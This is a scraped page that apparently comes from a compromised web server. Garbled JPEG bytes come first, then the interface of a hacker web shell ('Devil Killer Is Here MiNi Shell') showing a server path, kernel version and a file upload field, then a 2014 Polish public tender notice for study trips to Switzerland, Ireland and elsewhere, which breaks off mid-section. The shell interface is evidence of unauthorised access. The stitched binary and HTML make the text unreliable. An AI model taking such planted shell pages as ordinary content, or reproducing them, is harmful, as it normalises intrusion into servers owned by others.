JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140729/253540-N-2014.html

<p class="kh_header"><b>Kielce: PRZETARG NIEOGRANICZONY NA KOMPLEKSOWĄ ORGANIZACJĘ WYJAZDÓW STUDYJNYCH  W RAMACH REALIZACJI PROJEKTU PN. PERSPEKTYWY RSI ŚWIĘTOKRZYSKIE (IV ETAP)</b><br>
<b>Numer ogłoszenia: 253540 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Innowacji i Transferu Technologii sp. z o.o. , al. Solidarności 34, 25-323 Kielce, woj. świętokrzyskie, tel. 41 3432910, faks 41 3432912.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.it.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY NA KOMPLEKSOWĄ ORGANIZACJĘ WYJAZDÓW STUDYJNYCH  W RAMACH REALIZACJI PROJEKTU PN. PERSPEKTYWY RSI ŚWIĘTOKRZYSKIE (IV ETAP).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa organizacja wyjazdów studyjnych w ramach realizacji projektu pn. Perspektywy RSI Świętokrzyskie (IV Etap), zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia. Przedmiot zamówienia podzielony jest na 4 części. I część przedmiotu zamówienia obejmuje kompleksową organizację wyjazdu studyjnego do Szwajcarii. II część przedmiotu zamówienia obejmuje kompleksową organizację wyjazdu studyjnego do Irlandii. III część przedmiotu zamówienia obejmuje kompleksową organizację wyjazdu studyjnego: Słowacja - Austria - Czechy. IV część przedmiotu zamówienia obejmuje kompleksową organizację wyjazdu studyjnego do Szwecji. Szczegółowy Opis Przedmiotu Zamowienia dla poszczególnych części zamieszczony został w Specyfikacji Istotnych Warunków Zamówienia Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.99.70.00-9, 63.51.50.00-2, 79.95.10.00-5, 55.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeśli przepisy prawa nakładają obowiązek ich posiadania. Na potwierdzenie należy złożyć oświadczenie wg wzoru stanowiącego - odpowiednio w zależności od części przedmiotu zamówienia - załącznik nr 2a) (dla I części zamówienia)/ 2b) (dla II części zamówienia)/ 2c) (dla III części zamówienia)/ 2d) (dla IV części zamówienia) do SIWZ. Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu 
o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia / nie spełnia, 
na podstawie dokumentów załączonych do oferty, które zostały wyszczególnione w  Rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz spełniają warunki dotyczące posiadania wiedzy i doświadczenia. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca lub podwykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował:
b.1) w odniesieniu do I części przedmiotu zamówienia: co najmniej 2 usługi, polegające na organizacji i obsłudze zagranicznego wyjazdu studyjnego lub wizyty studyjnej lub misji branżowej/gospodarczej lub wizyty studyjno - szkoleniowej dla co najmniej 5 osób. W tym przypadku przez organizację, Zamawiający rozumie zapewnienie transportu lotniczego, transportu lądowego, noclegów, wyżywienia, ubezpieczenia uczestników i zapewnienie opiekuna merytorycznego/ przewodnika merytorycznego/moderatora spotkań oraz organizację spotkań merytorycznych z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługi te zostały wykonana oraz załączeniem dowodu, czy usługi te zostały wykonane lub są wykonywane należycie. Zgodnie z Rozdziałem V pkt 1 podpunkt 5) należy złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług  z wykorzystaniem załączonego wzoru oraz należy dołączyć dokumenty potwierdzające, że wykazane usługi zostały wykonane lub są wykonywane należycie (dokumenty potwierdzające, że usługi zostały wykonane należycie tj.:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1;
Przedstawione Zamawiającemu dokumenty winny dotyczyć wyłącznie usług wskazanych w Załączniku nr 5a do SIWZ. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt  1)-2). Na potwierdzenie należy również złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2a do SIWZ;
b.2) w odniesieniu do II części przedmiotu zamówienia: co najmniej 2 usługi, polegające na organizacji i obsłudze zagranicznego wyjazdu studyjnego lub wizyty studyjnej lub misji branżowej/gospodarczej lub wizyty studyjno - szkoleniowej dla co najmniej 5 osób. W tym przypadku przez organizację, Zamawiający rozumie zapewnienie transportu lotniczego, transportu lądowego, noclegów, wyżywienia, ubezpieczenia uczestników i zapewnienie opiekuna merytorycznego/ przewodnika merytorycznego/moderatora spotkań oraz organizację spotkań merytorycznych z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługi te zostały wykonana oraz załączeniem dowodu, czy usługi te zostały wykonane lub są wykonywane należycie. Zgodnie z Rozdziałem V pkt 1 podpunkt 5) należy złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług  z wykorzystaniem załączonego wzoru oraz należy dołączyć dokumenty potwierdzające, że wykazane usługi zostały wykonane lub są wykonywane należycie (dokumenty potwierdzające, że usługi zostały wykonane należycie tj.:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1;
Przedstawione Zamawiającemu dokumenty winny dotyczyć wyłącznie usług wskazanych w Załączniku nr 5b do SIWZ. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt  1)-2). Na potwierdzenie należy również złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2b do SIWZ;
b.3) w odniesieniu do III części przedmiotu zamówienia: co najmniej 2 usługi, polegające na organizacji i obsłudze zagranicznego wyjazdu studyjnego lub wizyty studyjnej lub misji branżowej/gospodarczej lub wizyty studyjno - szkoleniowej dla co najmniej 5 osób. W tym przypadku przez organizację, Zamawiający rozumie zapewnienie transportu lotniczego, transportu lądowego, noclegów, wyżywienia, ubezpieczenia uczestników i zapewnienie opiekuna merytorycznego/ przewodnika merytorycznego/moderatora spotkań oraz organizację spotkań merytorycznych z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługi te zostały wykonana oraz załączeniem dowodu, czy usługi te zostały wykonane lub są wykonywane należycie. Zgodnie z Rozdziałem V pkt 1 podpunkt 5) należy złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług  z wykorzystaniem załączonego wzoru oraz należy dołączyć dokumenty potwierdzające, że wykazane usługi zostały wykonane lub są wykonywane należycie (dokumenty potwierdzające, że usługi zostały wykonane należycie tj.:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1;
Przedstawione Zamawiającemu dokumenty winny dotyczyć wyłącznie usług wskazanych w Załączniku nr 5c do SIWZ. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt  1)-2). Na potwierdzenie należy również złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2c do SIWZ;
b.4) w odniesieniu do IV części przedmiotu zamówienia: co najmniej 2 usługi, polegające na organizacji i obsłudze zagranicznego wyjazdu studyjnego lub wizyty studyjnej lub misji branżowej/gospodarczej lub wizyty studyjno - szkoleniowej dla co najmniej 5 osób. W tym przypadku przez organizację, Zamawiający rozumie zapewnienie transportu lotniczego, transportu lądowego, noclegów, wyżywienia, ubezpieczenia uczestników i zapewnienie opiekuna merytorycznego/ przewodnika merytorycznego/moderatora spotkań oraz organizację spotkań merytorycznych z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługi te zostały wykonana oraz załączeniem dowodu, czy usługi te zostały wykonane lub są wykonywane należycie. Zgodnie z Rozdziałem V pkt 1 podpunkt 5) należy złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług  z wykorzystaniem załączonego wzoru oraz należy dołączyć dokumenty potwierdzające, że wykazane usługi zostały wykonane lub są wykonywane należycie (dokumenty potwierdzające, że usługi zostały wykonane należycie tj.:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1;
Przedstawione Zamawiającemu dokumenty winny dotyczyć wyłącznie usług wskazanych w Załączniku nr 5d do SIWZ. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt  1)-2). Na potwierdzenie należy również złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2d do SIWZ. Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu 
o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia / nie spełnia, 
na podstawie dokumentów załączonych do oferty, które zostały wyszczególnione w  Rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. Na potwierdzenie należy złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2a (część I przedmiotu zamówienia)/ 2b (część II przedmiotu zamówienia)/ 2c (część III przedmiotu zamówienia)/ 2d (część IV przedmiotu zamówienia) do SIWZ.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu 
o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia / nie spełnia, 
na podstawie dokumentów załączonych do oferty, które zostały wyszczególnione w  Rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz spełniają warunki dotyczące dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia. Na potwierdzenie należy złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2a (część I przedmiotu zamówienia)/ 2b (część II przedmiotu zamówienia)/ 2c (część III przedmiotu zamówienia)/ 2d (część IV przedmiotu zamówienia) do SIWZ.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu 
o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia / nie spełnia, 
na podstawie dokumentów załączonych do oferty, które zostały wyszczególnione w  Rozdziale V niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz spełniają warunki dotyczące sytuacji ekonomicznej i finansowej. Na potwierdzenie należy złożyć oświadczenie wg wzoru stanowiącego Załącznik nr 2a (część I przedmiotu zamówienia)/ 2b (część II przedmiotu zamówienia)/ 2c (część III przedmiotu zamówienia)/ 2d (część IV przedmiotu zamówienia) do SIWZ.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu 
o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia / nie spełnia, 
na podstawie dokumentów załączonych do oferty, które zostały wyszczególnione w  Rozdziale V niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.it.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyskie Centrum Innowacji i Transferu Technologii Spółka z o. o. 
al. Solidarności 34, 25 - 323 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2014 godzina 12:00, miejsce: Świętokrzyskie Centrum Innowacji i Transferu Technologii Spółka z o. o. 
al. Solidarności 34, 25 - 323 Kielce, VI piętro - Sala Konferencyjna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest z Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VIII Regionalne Kadry Gospodarki, Działania 8.2 Transfer wiedzy, Poddziałania 8.2.2 Regionalne Strategie Innowacji w ramach realizacji Projektu pn. Perspektywy RSI Świętokrzyskie (IV Etap).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot zamówienia obejmuje kompleksową organizację wyjazdu studyjnego do Szwajcarii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TEMAT WYJAZDU: Administracja i zarządzanie - polityka innowacji na przykładzie Szwajcarii
TERMIN REALIZACJI: I połowa października (szczegółowy termin do uzgodnienia 
z Zamawiającym na etapie realizacji usługi)
MIEJSCE: Szwajcaria/Genewa/Bern
LICZBA UCZESTNIKÓW/PROFIL: W wyjeździe uczestniczyć będzie 6 osób dorosłych.
W skład delegacji wejdą pracownicy następujących Instytucji:
Przedstawiciel Zarządu Województwa Świętokrzyskiego (1 osoba);
Kadra kierownicza oraz pracownicy Biura Innowacji Urzędu Marszałkowskiego          (2 osoby);
Przedstawiciel Świętokrzyskiego Związku Pracodawców Prywatnych LEWIATAN       (1 osoba);
Przedstawiciel Loży Świętokrzyskiej Business Centre Club (1 osoba);
Przedstawiciel Kadry kierowniczej Regionalnego Centrum Naukowo - Technologicznego (1 osoba).
CEL WYJAZDU: Celem wizyty studyjnej do Szwajcarii jest;
- transfer wiedzy w zakresie najskuteczniejszych metod współpracy nauki z biznesem oraz animacja współpracy międzynarodowej;
- uzyskanie wsparcia dla kreowania nowoczesnych systemów współpracy nauka - biznes;
- transfer technologiczny dla firm z regionu i ich ewentualny udział 
w cyklicznie organizowanych pokazach naukowych nowych produktów.
Szczegółowy Opis Przedmiotu Zamówienia zamieszczony został w Specyfikacji Istotnych Warunków Zamówienia Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.99.70.00-9, 63.51.50.00-2, 79.95.10.00-5, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot zamówienia obejmuje kompleksową organizację wyjazdu studyjnego do Irlandii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TEMAT WYJAZDU: Rozwój kompetencji pracowników naukowo - dydaktycznych Wydziału Zarządzania i Modelowania Komputerowego Politechniki Świętokrzyskiej w Kielcach  w zakresie wykorzystania i rozwoju bazy laboratoryjnej Wydziału do doskonalenia jakości procesu dydaktycznego i rozwoju badań naukowych w powiązaniu z otoczeniem gospodarczym regionu świętokrzyskiego 
TERMIN REALIZACJI: Październik 2014 r. (termin do uzgodnienia z Zamawiającym na etapie realizacji usługi).
MIEJSCE: Irlandia/Dublin, Dunleer, Naas
